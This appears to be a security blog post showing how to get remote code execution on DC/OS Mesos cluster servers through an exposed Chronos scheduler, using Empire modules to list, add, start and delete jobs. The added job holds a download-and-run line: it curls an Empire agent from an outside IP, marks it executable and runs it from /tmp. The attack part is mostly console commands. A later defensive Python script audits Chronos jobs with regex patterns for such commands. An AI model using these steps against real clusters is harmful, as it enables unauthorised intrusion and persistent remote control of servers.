OWNerchestration - Chronos (ab)Use

We can also gain Remote Code Execution (RCE) on servers within the cluster using the Chronos service. Chronos was frequently installed within DC/OS Mesos clusters to provide job scheduling, similar to crontab but distributed across all servers within the cluster.

By default, an attacker can interact with the Chronos service to gain RCE on servers within the cluster using the following techniques within Empire…

List Chronos Jobs

We can use the “http_rest_api” module to list Chronos jobs using the following commands…

(Empire)> agents
(Empire: agents)> interact IHCY2HLZ
(Empire: IHCY2HLZ)> usemodule situational_awareness/network/http_rest_api
(Empire: python/situational_awareness/network/http_rest_api)> set RequMethod GET
(Empire: python/situational_awareness/network/http_rest_api)> set Protocol http
(Empire: python/situational_awareness/network/http_rest_api)> set Target 10.0.3.234
(Empire: python/situational_awareness/network/http_rest_api)> set Path /scheduler/jobs
(Empire: python/situational_awareness/network/http_rest_api)> set Port 24641
(Empire: python/situational_awareness/network/http_rest_api)> execute

Add Chronos Job

We can use the “chronos_api_add_job” module to add a Chronos job using the following commands…

(Empire)> agents
(Empire: agents)> interact IHCY2HLZ
(Empire: IHCY2HLZ)> usemodule situational_awareness/network/dcos/chronos_api_add_job
(Empire: python/situational_awareness/network/dcos/chronos_api_add_job)> set Target 10.0.3.234
(Empire: python/situational_awareness/network/dcos/chronos_api_add_job)> set Port 24641
(Empire: python/situational_awareness/network/dcos/chronos_api_add_job)> set Cmd curl -o /tmp/emPyre -s http://138.68.47.120:8000/emPyre && chmod +x /tmp/emPyre && /tmp/emPyre
(Empire: python/situational_awareness/network/dcos/chronos_api_add_job)> execute

Start Chronos Job

We can use the “http_rest_api” module to start a Chronos job using the following commands…

(Empire)> agents
(Empire: agents)> interact IHCY2HLZ
(Empire: IHCY2HLZ)> usemodule situational_awareness/network/http_rest_api
(Empire: python/situational_awareness/network/http_rest_api)> set RequMethod PUT
(Empire: python/situational_awareness/network/http_rest_api)> set Protocol http
(Empire: python/situational_awareness/network/http_rest_api)> set Target 10.0.3.234
(Empire: python/situational_awareness/network/http_rest_api)> set Path /scheduler/job/scheduledJob001
(Empire: python/situational_awareness/network/http_rest_api)> set Port 24641
(Empire: python/situational_awareness/network/http_rest_api)> execute

Delete a Chronos Job

We can use the “http_rest_api” module to delete a Chronos job using the following commands…

(Empire)> agents
(Empire: agents)> interact IHCY2HLZ
(Empire: IHCY2HLZ)> usemodule situational_awareness/network/http_rest_api
(Empire: python/situational_awareness/network/http_rest_api)> set RequMethod DELETE
(Empire: python/situational_awareness/network/http_rest_api)> set Protocol http
(Empire: python/situational_awareness/network/http_rest_api)> set Target 10.0.3.234
(Empire: python/situational_awareness/network/http_rest_api)> set Path /scheduler/job/scheduledJob001
(Empire: python/situational_awareness/network/http_rest_api)> set Port 24641
(Empire: python/situational_awareness/network/http_rest_api)> execute
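
From the defender's side, the same /scheduler/jobs listing can be audited for jobs like the one added above. The following is an added example, not part of the original post or of Empire: it checks each job's command for download-and-run traits and, optionally, against a baseline of expected job names. The sample JSON is constructed and assumes Chronos job objects carry "name" and "command" fields; the rule names, the "nightly-report" job and the baseline set are hypothetical.

```python
import json
import re

# Constructed sample of a GET /scheduler/jobs response (not captured from a real
# cluster). Assumes Chronos job objects carry "name" and "command" fields.
SAMPLE_JOBS = json.dumps([
    {"name": "nightly-report", "schedule": "R/2017-01-01T02:00:00Z/P1D",
     "command": "/opt/reports/run.sh --daily"},
    {"name": "scheduledJob001", "schedule": "R/2017-01-01T00:00:00Z/PT1M",
     "command": "curl -o /tmp/emPyre -s http://138.68.47.120:8000/emPyre"
                " && chmod +x /tmp/emPyre && /tmp/emPyre"},
])

# Hypothetical rule set: each pattern marks one trait of a download-and-run command.
RULES = {
    "remote-fetch": re.compile(r"\b(?:curl|wget)\b[^|;&]*https?://", re.I),
    "raw-ip-url": re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}\b"),
    "chmod-exec": re.compile(r"\bchmod\s+[ugoa]*\+[rw]*x"),
    "runs-from-tmp": re.compile(r"(?:^|[;&|])\s*(?:/tmp|/var/tmp|/dev/shm)/\S+"),
    "pipe-to-shell": re.compile(r"\|\s*(?:ba|z|da)?sh\b"),
}


def audit_jobs(jobs_json, baseline=frozenset()):
    """Return {job name: sorted findings} for jobs that trip at least one check.

    baseline is the set of job names the cluster owners expect to exist; when it
    is non-empty, any job outside it is reported as "not-in-baseline".
    """
    findings = {}
    for job in json.loads(jobs_json):
        name = job.get("name", "<unnamed>")
        command = job.get("command", "")
        hits = [rule for rule, rx in RULES.items() if rx.search(command)]
        if baseline and name not in baseline:
            hits.append("not-in-baseline")
        if hits:
            findings[name] = sorted(hits)
    return findings


if __name__ == "__main__":
    for name, hits in audit_jobs(SAMPLE_JOBS, {"nightly-report"}).items():
        print(f"{name}: {', '.join(hits)}")
```

Run on a schedule against each Chronos endpoint, a job that appears outside the baseline is worth an alert on its own, whatever its command looks like.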

Demo

You can see a quick demo of this process in the following video…

Bryce Kunz